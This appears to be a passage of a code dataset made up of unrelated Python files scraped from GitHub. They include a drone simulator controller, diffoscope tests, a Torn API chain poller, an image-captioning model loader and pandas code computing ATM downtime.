+{"seq_id":"29992892657","text":"\ndef soroban(frame):\n    for i in range(len(frame)):\n        frame[i] = 
frame[i][::-1]\n ans = 0\n power = 1\n for elem in frame[0]:\n if elem == '|':\n # '5-bead' is active:\n ans += 5 * power\n power *= 10\n power = 1\n for col in range(len(frame[0])):\n cnt = 0\n idx = 3\n while idx < len(frame) and frame[idx][col] == 'O':\n cnt += 1\n idx += 1\n ans += cnt * power\n power *= 10\n return ans\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"ivSPJNgW4ChfbrKbR_20.py","file_name":"ivSPJNgW4ChfbrKbR_20.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17224858857","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 27 08:49:45 2020\n\n@author: Angel Ayala \n\"\"\"\nimport numpy as np\n\nfrom webots_drone.utils import bytes2image\n\n\nclass Drone:\n \"\"\"The Drone class manage each sensor and actuators of the drone.\n\n It is developed for the Mavic 2 Pro drone, it consists of GPS, IMU, Gyro,\n Compass, Camera, LED and Motor nodes.\n This drone control unit is designed to stabilize the drone through 4 PID\n controllers tunned for a 8ms simulation timestep, and the drone's gimbal\n with a Damping node in the WorldInfo node with values of 0.5 for both\n angular and linear fields.\n\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n :param string name: A name for the controller, just for debug purpose.\n :param float start_alt: The initial altitude to be reached.\n \"\"\"\n\n def __init__(self, robot):\n # Time helpers\n self.time_counter = 0\n\n # Variables\n self.lift_thrust = 68.5 # with this thrust, the drone lifts.\n self.init_dist_sensors(robot, int(robot.getBasicTimeStep()))\n self.init_devices(robot, int(robot.getBasicTimeStep()))\n self._position = np.array([0.0, 0.0, 0.0])\n\n def init_dist_sensors(self, drone_node, timestep):\n \"\"\"Initialize each sensor distance of the Mavic 2 Pro.\n\n :param drone_node Robot: The instantiated Robot Node class.\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n \"\"\"\n self.sensors_id = ['front left dist sonar',\n 'front right dist sonar',\n 'rear top dist sonar',\n 'rear bottom dist sonar',\n 'left side dist sonar',\n 'right side dist sonar',\n 'down front dist sonar',\n 'down back dist sonar',\n 'top dist infrared']\n # instantiate distance sensors\n self.sensors = list()\n for sid in self.sensors_id:\n sensor = drone_node.getDevice(sid)\n sensor.enable(timestep)\n self.sensors.append(sensor)\n\n return True\n\n def init_devices(self, drone_node, timestep):\n \"\"\"Initialize each device of the Mavic 2 Pro, in a desired timestep.\n\n The camera node is initialized at 33ms timestep to reach ~30fps.\n\n :param drone Robot: The instantiated Robot Node class.\n :param integer timestep: The simulation timestep, 8ms mus be setted,\n unexpected behaviour can occur with a different value.\n \"\"\"\n # Position coordinates [X, Y, Z]\n self.gps = drone_node.getDevice(\"gps\")\n self.gps.enable(timestep)\n # Angles respect global coordinates [roll, pitch, yaw]\n self.imu = drone_node.getDevice(\"inertial unit\")\n self.imu.enable(timestep)\n # Acceleration angles [roll, pitch, yaw]\n self.gyro = drone_node.getDevice(\"gyro\")\n self.gyro.enable(timestep)\n # Direction degree with north as reference\n self.compass = drone_node.getDevice(\"compass\")\n self.compass.enable(timestep)\n\n # Video acquisition\n fps = 25\n 
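        # 1000 // fps is the camera sampling period in milliseconds
        # (40 ms at 25 fps); note this differs from the "~30fps" figure
        # mentioned in the init_devices docstring above.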
self.camera = drone_node.getDevice(\"camera\")\n self.camera_rate = 1000 // fps\n self.camera.enable(self.camera_rate)\n\n # LEDS\n self.leds = [\n drone_node.getDevice(\"front left led\"),\n drone_node.getDevice(\"front right led\")\n ]\n\n # Gimbal\n self.camera_roll = drone_node.getDevice(\"camera roll\")\n self.camera_pitch = drone_node.getDevice(\"camera pitch\")\n\n # Motors\n self.motors_id = ['front left propeller',\n 'front right propeller',\n 'rear left propeller',\n 'rear right propeller']\n self.motors = list()\n for mid in self.motors_id:\n motor = drone_node.getDevice(mid)\n motor.setPosition(float('inf'))\n motor.setVelocity(1.)\n self.motors.append(motor)\n\n return True\n\n def blink_leds(self):\n \"\"\"Blink the LED nodes.\"\"\"\n led_state = int(self.time_counter) % 2\n self.leds[0].set(led_state)\n self.leds[1].set(int(not led_state))\n\n def gimbal_stabilize(self):\n \"\"\"Stabilize camera (gimbal).\"\"\"\n acceleration = self.gyro.getValues()\n self.camera_roll.setPosition(-0.115 * acceleration[0])\n self.camera_pitch.setPosition(-0.1 * acceleration[1])\n\n def get_odometry(self):\n \"\"\"Get the drone's current acceleration, angles and position.\"\"\"\n orientation = self.imu.getRollPitchYaw()\n angular_velocity = self.gyro.getValues()\n position = self.gps.getValues()\n speed = self.gps.getSpeedVector()\n compass = self.compass.getValues()\n north_rad = np.arctan2(compass[0], compass[1])\n\n return orientation, angular_velocity, position, speed, north_rad\n\n def get_image(self):\n \"\"\"Get the Camera node image with size and channels.\n\n :return the data image with BGRA values\n \"\"\"\n camera_image = None\n if self.camera.getImage():\n camera_image = bytes2image(self.camera.getImage(),\n self.get_camera_image_shape())\n return camera_image\n\n def get_dist_sensors(self):\n \"\"\"Get the Distance sensors Nodes' measurements.\"\"\"\n sensors = dict()\n for i, sensor_name in enumerate(self.sensors_id):\n dist_sensor = self.sensors[i]\n sensors[sensor_name] = [dist_sensor.getValue(),\n dist_sensor.getMinValue(),\n dist_sensor.getMaxValue()]\n return sensors\n\n def get_camera_image_shape(self):\n \"\"\"Get the camera image dimension and channels.\"\"\"\n return (self.camera.getHeight(), self.camera.getWidth(), 4) # channels\n\n def set_motors_velocity(self, fl_motor, fr_motor, rl_motor, rr_motor):\n \"\"\"Set the drone's motor velocity.\"\"\"\n # Actuate over the motors\n if not np.isnan(fl_motor):\n self.motors[0].setVelocity(self.lift_thrust + fl_motor)\n self.motors[1].setVelocity(-(self.lift_thrust + fr_motor))\n self.motors[2].setVelocity(-(self.lift_thrust + rl_motor))\n self.motors[3].setVelocity(self.lift_thrust + rr_motor)\n","repo_name":"angel-ayala/gym-webots-drone","sub_path":"controllers/drone_controller/drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1001993413","text":"def q1(inputString):\n if len(inputString) < 2:\n print('There is no third largest integer for this input.')\n return\n #print the largest letter from the string\n currentIndex = 0\n currentMaxChar = 'a'\n currentSecondMaxChar = 'a'\n currentThirdMaxChar = 'a'\n while currentIndex < len(inputString):\n currentChar = inputString[currentIndex]\n if (currentChar.lower() > currentMaxChar):\n currentMaxChar = currentChar\n currentSecondMaxChar = currentMaxChar\n if (currentChar < currentMaxChar):\n currentSecondMaxChar = currentChar\n currentThirdMaxChar = 
currentSecondMaxChar\n if (currentChar < currentSecondMaxChar):\n currentThirdMaxChar = currentSecondMaxChar\n currentIndex = currentIndex + 1\n\n maxLetterCount = 0\n for a in inputString:\n count = 0\n for b in inputString:\n if(a == b):\n count = count + 1\n if(count > maxLetterCount):\n maxLetterCount = count\n repeatLetter = a\n print('In {}, the largest letter is {}, the third largest letter is {}, and the most common letter is {}, occuring {} times.'.format(inputString,currentMaxChar,currentThirdMaxChar,repeatLetter,maxLetterCount))\n return\n","repo_name":"nihaal-gill/Example-Coding-Projects","sub_path":"Working with Strings/Strings.py","file_name":"Strings.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28468405102","text":"import os.path\nimport shutil\nimport pytest\nfrom diffoscope.comparators import specialize\nfrom diffoscope.comparators.binary import FilesystemFile, NonExistingFile\ntry:\n from diffoscope.comparators.debian import DotChangesFile, DotDscFile\n miss_debian_module = False\nexcept ImportError:\n from diffoscope.comparators.debian_fallback import DotChangesFile, DotDscFile\n miss_debian_module = True\nfrom diffoscope.config import Config\nfrom diffoscope.presenters.text import output_text\n\nTEST_DOT_CHANGES_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.changes')\nTEST_DOT_CHANGES_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.changes')\nTEST_DEB_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.deb')\nTEST_DEB_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.deb')\n\n@pytest.fixture\ndef dot_changes1(tmpdir):\n tmpdir.mkdir('a')\n dot_changes_path = str(tmpdir.join('a/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_changes_path)\n shutil.copy(TEST_DEB_FILE1_PATH, str(tmpdir.join('a/test_1_all.deb')))\n return specialize(FilesystemFile(dot_changes_path))\n\n@pytest.fixture\ndef dot_changes2(tmpdir):\n tmpdir.mkdir('b')\n dot_changes_path = str(tmpdir.join('b/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE2_PATH, dot_changes_path)\n shutil.copy(TEST_DEB_FILE2_PATH, str(tmpdir.join('b/test_1_all.deb')))\n return specialize(FilesystemFile(dot_changes_path))\n\ndef test_dot_changes_identification(dot_changes1):\n assert isinstance(dot_changes1, DotChangesFile)\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_invalid(tmpdir):\n tmpdir.mkdir('a')\n dot_changes_path = str(tmpdir.join('a/test_1.changes'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_changes_path)\n # we don't copy the referenced .deb\n identified = specialize(FilesystemFile(dot_changes_path))\n assert not isinstance(identified, DotChangesFile)\n\ndef test_dot_changes_no_differences(dot_changes1):\n difference = dot_changes1.compare(dot_changes1)\n assert difference is None\n\n@pytest.fixture\ndef dot_changes_differences(dot_changes1, dot_changes2):\n difference = dot_changes1.compare(dot_changes2)\n output_text(difference, print_func=print)\n return difference.details\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_description(dot_changes_differences):\n assert dot_changes_differences[0]\n expected_diff = open(os.path.join(os.path.dirname(__file__), '../data/dot_changes_description_expected_diff')).read()\n assert dot_changes_differences[0].unified_diff == 
expected_diff\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_internal_diff(dot_changes_differences):\n assert dot_changes_differences[2].source1 == 'test_1_all.deb'\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_changes_compare_non_existing(monkeypatch, dot_changes1):\n monkeypatch.setattr(Config.general, 'new_file', True)\n difference = dot_changes1.compare(NonExistingFile('/nonexisting', dot_changes1))\n output_text(difference, print_func=print)\n assert difference.source2 == '/nonexisting'\n assert difference.details[-1].source2 == '/dev/null'\n\nTEST_DOT_DSC_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.dsc')\nTEST_DOT_DSC_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.dsc')\nTEST_DEB_SRC1_PATH = os.path.join(os.path.dirname(__file__), '../data/test1.debsrc.tar.gz')\nTEST_DEB_SRC2_PATH = os.path.join(os.path.dirname(__file__), '../data/test2.debsrc.tar.gz')\n\n@pytest.fixture\ndef dot_dsc1(tmpdir):\n tmpdir.mkdir('a')\n dot_dsc_path = str(tmpdir.join('a/test_1.dsc'))\n shutil.copy(TEST_DOT_DSC_FILE1_PATH, dot_dsc_path)\n shutil.copy(TEST_DEB_SRC1_PATH, str(tmpdir.join('a/test_1.tar.gz')))\n return specialize(FilesystemFile(dot_dsc_path))\n\n@pytest.fixture\ndef dot_dsc2(tmpdir):\n tmpdir.mkdir('b')\n dot_dsc_path = str(tmpdir.join('b/test_1.dsc'))\n shutil.copy(TEST_DOT_DSC_FILE2_PATH, dot_dsc_path)\n shutil.copy(TEST_DEB_SRC2_PATH, str(tmpdir.join('b/test_1.tar.gz')))\n return specialize(FilesystemFile(dot_dsc_path))\n\ndef test_dot_dsc_identification(dot_dsc1):\n assert isinstance(dot_dsc1, DotDscFile)\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_invalid(tmpdir, dot_dsc2):\n tmpdir.mkdir('a')\n dot_dsc_path = str(tmpdir.join('a/test_1.dsc'))\n shutil.copy(TEST_DOT_CHANGES_FILE1_PATH, dot_dsc_path)\n # we don't copy the referenced .tar.gz\n identified = specialize(FilesystemFile(dot_dsc_path))\n assert not isinstance(identified, DotDscFile)\n\ndef test_dot_dsc_no_differences(dot_dsc1):\n difference = dot_dsc1.compare(dot_dsc1)\n assert difference is None\n\n@pytest.fixture\ndef dot_dsc_differences(dot_dsc1, dot_dsc2):\n difference = dot_dsc1.compare(dot_dsc2)\n output_text(difference, print_func=print)\n return difference.details\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_internal_diff(dot_dsc_differences):\n assert dot_dsc_differences[1].source1 == 'test_1.tar.gz'\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_compare_non_existing(monkeypatch, dot_dsc1):\n monkeypatch.setattr(Config.general, 'new_file', True)\n difference = dot_dsc1.compare(NonExistingFile('/nonexisting', dot_dsc1))\n output_text(difference, print_func=print)\n assert difference.source2 == '/nonexisting'\n assert difference.details[-1].source2 == '/dev/null'\n","repo_name":"edolstra/diffoscope","sub_path":"tests/comparators/test_debian.py","file_name":"test_debian.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73773737691","text":"\"\"\"multisearch URL Configuration\n\nConfigure URL for endpoints:\n/site/\n/site/:site_id/\n/search/:site_id?term=foo\n\"\"\"\n\n\nfrom django.conf.urls import url\nfrom .views.api import (\n search,\n sites,\n site,\n)\n\n\nurlpatterns = [\n 
url(r'^search/(?P\\w+).*$', search, name=\"search\"),\n url(r'^site/$', sites, name=\"sites\"),\n url(r'^site/(?P\\w+)/$', site, name=\"site\"),\n]","repo_name":"jdeveloperw/multisearch","sub_path":"server/multisearch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27298147498","text":"import requests\nimport threading, time\nimport GLOBAL_CONFIG\nDEBUG_LOG = False\n\nAPI_KEY = GLOBAL_CONFIG.API_KEY\nAPI_FACTION_ID = \"36134\"\nAPI_CHAIN_REQUEST_URL = \"https://api.torn.com/faction/%s?selections=chain&key=%s\" % (API_FACTION_ID, API_KEY)\nAPI_FACTION_REQUEST_URL = \"https://api.torn.com/faction/%s?selections=&key=%s\" % (API_FACTION_ID, API_KEY)\nAPI_REQUEST_TIME_INTERVAL = 5\n\nsession = requests.session()\nif GLOBAL_CONFIG.USE_PROXIES:\n session.proxies = GLOBAL_CONFIG.proxies\n\nfaction_name = \"\"\nchain_current = -1\nchain_max = -1\nchain_timeout = -1\nchain_last_update_timestamp = -1\n\n\ndef debug_log_chain_state():\n if DEBUG_LOG:\n print(chain_current, chain_max, chain_timeout)\n\n\ndef chain_detail_info_make() -> str:\n return 'faction: %s\\n当前chain: %d\\n最大chain: %d\\n剩余时间: %d秒\\n预估剩余时间:%d秒\\n距离上次更新已过去:%d秒' % (faction_name, chain_current, chain_max, chain_timeout, (chain_timeout - (time.time()-chain_last_update_timestamp)), time.time()-chain_last_update_timestamp)\n\n\ndef chain_simple_info_make() -> str:\n return '当前chain: %d\\n最大chain: %d\\n预估剩余时间:%d' % ( chain_current, chain_max, (chain_timeout - (time.time()-chain_last_update_timestamp)))\n\n\ndef update_faction_state():\n global faction_name\n r = requests.get(API_FACTION_REQUEST_URL).json()\n try:\n faction_name = r[\"name\"]\n except Exception as e:\n faction_name = \"\"\n\n\ndef update_chain_state():\n global chain_current, chain_max, chain_timeout, chain_last_update_timestamp\n r = session.get(API_CHAIN_REQUEST_URL).json()\n try:\n new_chain_current = r[\"chain\"][\"current\"]\n new_chain_max = r[\"chain\"][\"max\"]\n new_chain_timeout = r[\"chain\"][\"timeout\"]\n new_chain_timestamp = -1\n\n if (new_chain_current != chain_current) or (new_chain_max != chain_max) or (new_chain_timeout != chain_timeout):\n # 有新信息 更新last_update_timestamp\n new_chain_timestamp = time.time()\n else:\n # 没有新信息 不更新last_update_timestamp\n new_chain_timestamp = chain_last_update_timestamp\n\n chain_current = new_chain_current\n chain_max = new_chain_max\n chain_timeout = new_chain_timeout\n chain_last_update_timestamp = new_chain_timestamp\n\n except Exception as e:\n chain_current = -1\n chain_max = -1\n chain_timeout = -1\n chain_last_update_timestamp = -1\n\n\ndef api_life_cycle():\n while 1:\n try:\n if faction_name == \"\":\n update_faction_state()\n update_chain_state()\n debug_log_chain_state()\n except Exception as e:\n print(e)\n print('api.center.heartbeat')\n time.sleep(API_REQUEST_TIME_INTERVAL)\n\n\ndef commence_life_cycle():\n # 不要多次调用\n thread = threading.Thread(target=api_life_cycle)\n thread.start()","repo_name":"mirrorsysu/iTorn_source","sub_path":"torn/APICenter.py","file_name":"APICenter.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11670794425","text":"\"\"\"Model and feature extraction logic.\"\"\"\nfrom omegaconf import DictConfig\nfrom transformers import (GPT2Tokenizer, PreTrainedModel, PreTrainedTokenizer,\n VisionEncoderDecoderModel, ViTFeatureExtractor)\n\n\ndef 
def get_feature_extractor(\n pretrained_feature_extractor: str,\n) -> ViTFeatureExtractor:\n \"\"\"Get a pretrained ViT feature extractor by the given name.\n\n Args:\n pretrained_feature_extractor: The pretrained feature extractor name.\n\n Returns:\n The pretrained ViT feature extractor.\n \"\"\"\n return ViTFeatureExtractor.from_pretrained(\n pretrained_feature_extractor,\n )\n\n\ndef get_tokenizer(\n pretrained_tokenizer: str,\n) -> GPT2Tokenizer:\n \"\"\"Get a pretrained GPT2 tokenizer by the given name.\n\n Args:\n pretrained_tokenizer: The pretrained tokenizer name.\n\n Returns:\n The pretrained GPT2 tokenizer.\n \"\"\"\n tokenizer = GPT2Tokenizer.from_pretrained(\n pretrained_tokenizer, use_fast=True,\n )\n tokens_to_add = {\n 'pad_token': '[PAD]',\n 'bos_token': '[BOS]',\n 'eos_token': '[EOS]',\n }\n tokenizer.add_special_tokens(tokens_to_add)\n return tokenizer\n\n\ndef get_model(\n pretrained_encoder: str,\n pretrained_decoder: str,\n tokenizer: PreTrainedTokenizer,\n config: DictConfig,\n) -> PreTrainedModel:\n \"\"\"Get and configure a pretrained EncoderDecoder model.\n\n Args:\n pretrained_encoder: Pretrained encoder name.\n pretrained_decoder: Pretrained decoder name.\n tokenizer: Pretrained tokenizer for the encoder.\n config: Model configuration.\n\n Returns:\n A VisionEncoderDecoder model built from pretrained parts with the configuration applied.\n \"\"\"\n model = VisionEncoderDecoderModel.from_encoder_decoder_pretrained(\n pretrained_encoder, pretrained_decoder,\n )\n\n model.config.decoder_start_token_id = tokenizer.bos_token_id\n model.config.bos_token_id = tokenizer.bos_token_id\n model.config.pad_token_id = tokenizer.pad_token_id\n model.config.eos_token_id = tokenizer.eos_token_id\n\n model.decoder.resize_token_embeddings(len(tokenizer))\n model.config.vocab_size = model.config.decoder.vocab_size\n\n model.config.max_length = config.max_length\n model.config.num_beams = config.num_beams\n model.config.num_beam_groups = config.num_beam_groups\n model.config.early_stopping = config.early_stopping\n model.config.no_repeat_ngram_size = config.no_repeat_ngram_size\n model.config.length_penalty = config.length_penalty\n model.config.repetition_penalty = config.repetition_penalty\n model.config.diversity_penalty = config.diversity_penalty\n\n return model\n","repo_name":"EgSergeenko/product-images-captioning","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"11937636964","text":"import datetime as dt\nimport time as tm\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import Series\nfrom pandas.core.frame import DataFrame\nfrom progressbar import ProgressBar\n\nimport project.date_range as dr\nfrom project.pd import df_cartesian\nfrom project.pd.datasource.orcl import DataFrameReaderOrcl\nimport project.atmserv.typ as typ\n\n\ndef get_order_day(df_order, df_day):\n df = df_cartesian(df_order, df_day)\n return df.loc[(df.DATE_REG <= df.DAY) & (df.DAY <= df.DATE_END)]\n\n\ndef set_group_func(df, series, col_name, func):\n\n for item in series.unique():\n cond = series == item # boolean mask for each unique value\n df.loc[cond, col_name] = func(item)\n\n\ndef get_in_repair(df_atm_order):\n i = 0\n in_repair_list = []\n grp_atm_order = df_atm_order.groupby(['ATM_REF', 'DAY', 'SW_BEG', 'SW_END'])[['DATE_REG', 'DATE_END']]\n bar = ProgressBar(max_value=len(grp_atm_order.size())).start()\n for (atm_ref, day, sw_beg, sw_end), grp in grp_atm_order:\n\n
i += 1 # number of groups processed; used to update the progress bar in batches\n in_repair_day = []\n for order in grp.itertuples():\n\n (beg, end) = dr.inner_join([(sw_beg, sw_end), (order.DATE_REG, order.DATE_END)])\n if None not in [beg, end]:\n in_repair_day.append((beg, end))\n\n if i % 100 == 0:\n bar.update(i)\n\n in_repair_list.extend([(atm_ref, day, sw_beg, sw_end, *item) for item in dr.outer_join(in_repair_day) if item is not None])\n\n bar.finish()\n\n df_in_repair = pd.DataFrame(\n in_repair_list,\n columns=['ATM_REF', 'DAY', 'SW_BEG', 'SW_END', 'REPAIR_BEG', 'REPAIR_END']\n )\n\n # df_in_repair['REPAIR_TIME'] = df_in_repair['REPAIR_END'] - df_in_repair['REPAIR_BEG']\n\n return df_in_repair\n\n\ndef get_service_window(df_atm, df_day):\n\n def time_to_td(time):\n return pd.Timedelta(hours=time.hour, minutes=time.minute)\n\n set_group_func(df_atm, df_atm.A_TIME_BEG, 'TD_SERVICE_BEG', time_to_td) # Timedelta from midnight to the start of servicing\n set_group_func(df_atm, df_atm.A_TIME_END, 'TD_SERVICE_END', time_to_td) # Timedelta from midnight to the end of servicing\n\n # derive the service schedule from the weekday conditions\n df_atm_wd = df_cartesian(df_atm, pd.DataFrame({'WEEKDAY': [1, 2, 3, 4, 5, 6, 7]})) #.set_index(['ATM_REF', 'WEEKDAY'], False)\n cond = df_atm_wd.WEEKDAY > df_atm_wd.A_DAYS\n df_atm_wd.loc[cond, 'TD_SERVICE_BEG'] = pd.to_timedelta(0)\n df_atm_wd.loc[cond, 'TD_SERVICE_END'] = pd.to_timedelta(0)\n\n # the ATM availability schedule reduces to two fields (AVAIL_BEG and AVAIL_END) per weekday\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 1, 'TIME_AVAIL_BEG'] = df_atm_wd.MON_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 1, 'TIME_AVAIL_END'] = df_atm_wd.MON_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 2, 'TIME_AVAIL_BEG'] = df_atm_wd.TUE_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 2, 'TIME_AVAIL_END'] = df_atm_wd.TUE_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 3, 'TIME_AVAIL_BEG'] = df_atm_wd.WED_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 3, 'TIME_AVAIL_END'] = df_atm_wd.WED_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 4, 'TIME_AVAIL_BEG'] = df_atm_wd.THU_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 4, 'TIME_AVAIL_END'] = df_atm_wd.THU_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 5, 'TIME_AVAIL_BEG'] = df_atm_wd.FRI_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 5, 'TIME_AVAIL_END'] = df_atm_wd.FRI_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 6, 'TIME_AVAIL_BEG'] = df_atm_wd.SAT_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 6, 'TIME_AVAIL_END'] = df_atm_wd.SAT_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 7, 'TIME_AVAIL_BEG'] = df_atm_wd.SUN_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 7, 'TIME_AVAIL_END'] = df_atm_wd.SUN_END\n\n set_group_func(df_atm_wd, df_atm_wd.TIME_AVAIL_BEG, 'TD_AVAIL_BEG', time_to_td)\n set_group_func(df_atm_wd, df_atm_wd.TIME_AVAIL_END, 'TD_AVAIL_END', time_to_td)\n\n # expand the data to per-day granularity\n # df_atm_sw = pd.merge(df_atm_wd, df_day, 'outer', on='WEEKDAY').set_index(['ATM_REF', 'DAY'], False).sort_index()\n df_atm_sw = pd.merge(df_atm_wd, df_day, on='WEEKDAY').set_index(['ATM_REF', 'DAY'], False).sort_index()\n # print(df_atm_sw.info())\n\n # convert to datetime\n df_atm_sw['SERVICE_BEG'] = df_atm_sw.DAY + df_atm_sw.TD_SERVICE_BEG\n df_atm_sw['SERVICE_END'] = df_atm_sw.DAY + df_atm_sw.TD_SERVICE_END\n df_atm_sw['AVAIL_BEG'] = df_atm_sw.DAY + df_atm_sw.TD_AVAIL_BEG\n df_atm_sw['AVAIL_END'] = df_atm_sw.DAY + df_atm_sw.TD_AVAIL_END\n\n # merge the service and availability schedules\n
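# the effective window SW_* starts at the later of the two begin times and ends at the earlier of the two end times\n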
cond = df_atm_sw['AVAIL_BEG'] > df_atm_sw['SERVICE_BEG']\n df_atm_sw.loc[cond, 'SW_BEG'] = df_atm_sw.loc[cond, 'AVAIL_BEG']\n df_atm_sw.loc[~cond, 'SW_BEG'] = df_atm_sw.loc[~cond, 'SERVICE_BEG']\n\n cond = df_atm_sw['AVAIL_END'] < df_atm_sw['SERVICE_END']\n df_atm_sw.loc[cond, 'SW_END'] = df_atm_sw.loc[cond, 'AVAIL_END']\n df_atm_sw.loc[~cond, 'SW_END'] = df_atm_sw.loc[~cond, 'SERVICE_END']\n\n cond = df_atm_sw['SERVICE_BEG'] >= df_atm_sw['SERVICE_END']\n df_atm_sw.loc[cond, 'SW_BEG'] = df_atm_sw.loc[cond, 'DAY']\n df_atm_sw.loc[cond, 'SW_END'] = df_atm_sw.loc[cond, 'DAY']\n\n df_atm_sw['SW_TIME'] = df_atm_sw['SW_END'] - df_atm_sw['SW_BEG']\n\n # print(df_atm_sw)\n # df_atm_sw.to_csv('data/df_atm_sw.csv', sep='\\t')\n return df_atm_sw\n\n\ndef calc_idle(reader, date_beg, date_end):\n\n df_atm_all = reader.get_atm()\n df_service = reader.get_service(date_beg, date_end)\n df_order = reader.get_orders(date_beg, date_end)\n\n df_atm = df_service.merge(df_atm_all, on=['ATM_REF']) #.set_index('ATM_REF', False)\n\n # list of dates to analyze\n days = dr.date_list(date_beg, date_end)\n df_day = pd.DataFrame({'DAY':[d for d in days]})\n df_day.DAY = pd.to_datetime(df_day.DAY) # convert to datetime\n df_day['WEEKDAY'] = df_day.DAY.dt.weekday + 1 # reference weekday column\n\n df_atm_sw = get_service_window(df_atm, df_day) # compute the service window for every ATM\n\n # compute per-day repair time for every ATM\n df_order_day = get_order_day(df_order, df_day)\n df_atm_order = pd.merge(df_atm_sw, df_order_day, on=['ATM_REF', 'DAY']) #.set_index(['ATM_REF', 'DAY'], False)\n df_in_repair = get_in_repair(df_atm_order) # slow operation\n\n # compute per-day availability for every ATM\n df_idle = pd.merge(\n df_atm_sw[['ATM_REF', 'DAY', 'SW_BEG', 'SW_END', 'SW_TIME']],\n df_in_repair[['ATM_REF', 'DAY', 'REPAIR_BEG', 'REPAIR_END']],\n how='left',\n on=['ATM_REF', 'DAY']\n )\n df_idle['REPAIR_TIME'] = df_idle['REPAIR_END'] - df_idle['REPAIR_BEG']\n df_idle.loc[df_idle.REPAIR_TIME.isnull() & (df_idle.SW_TIME > pd.to_timedelta(0)), 'REPAIR_TIME'] = pd.to_timedelta(0)\n df_idle['AVAIL'] = 1 - (df_idle['REPAIR_TIME'] / df_idle['SW_TIME'])\n df_idle['DAY_DATE'] = df_idle.DAY.dt.date\n df_idle['DAY_MONTH'] = df_idle.DAY.dt.strftime('%Y.%m')\n df_idle['DAY_NUM'] = df_idle.DAY.dt.day\n\n # print(df_idle.info())\n # df_idle.to_csv('data/df_idle.csv', sep='\\t')\n\n df_atm_idle = df_atm[['ATM_REF', 'SERIAL', 'CITY', 'ADDR', 'MODEL']].merge(\n df_idle,\n how='left',\n on=['ATM_REF']\n # left_index=True,\n # right_index=True\n )\n\n df_atm_idle_pivot = df_atm_idle.pivot_table(index=['ATM_REF', 'SERIAL', 'CITY', 'ADDR', 'MODEL'], columns=['DAY_MONTH', 'DAY_NUM'], values=['AVAIL']) #.reset_index() #.set_index(['ATM_REF'])\n print(df_atm_idle_pivot)\n\n return df_atm_idle_pivot\n\n","repo_name":"privod/atm_chart","sub_path":"project/idle.py","file_name":"idle.py","file_ext":"py","file_size_in_byte":7947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"12395461593","text":"__author__ = 'gpetralia'\n\nimport json\nfrom contextlib import closing\nimport mysql.connector as MySQLdb\n\n# MAP driver name to Neutron agent name\nMAP_DRIVER_BINARY = {\n 'openvswitch': 'neutron-openvswitch-agent'\n}\n\n\nclass NeutronDb():\n \"\"\"\n Exposes methods to get information regarding Neutron resources.\n It manages the connection to the Neutron DB.\n \"\"\"\n def __init__(self, host, usr, pwd, db):\n self.conn = None\n self.conn = MySQLdb.connect(host=host,\n user=usr,\n passwd=pwd,\n db=db)\n\n
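# note: every getter below returns a dict keyed by resource UUID, with details nested under 'attributes'\n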
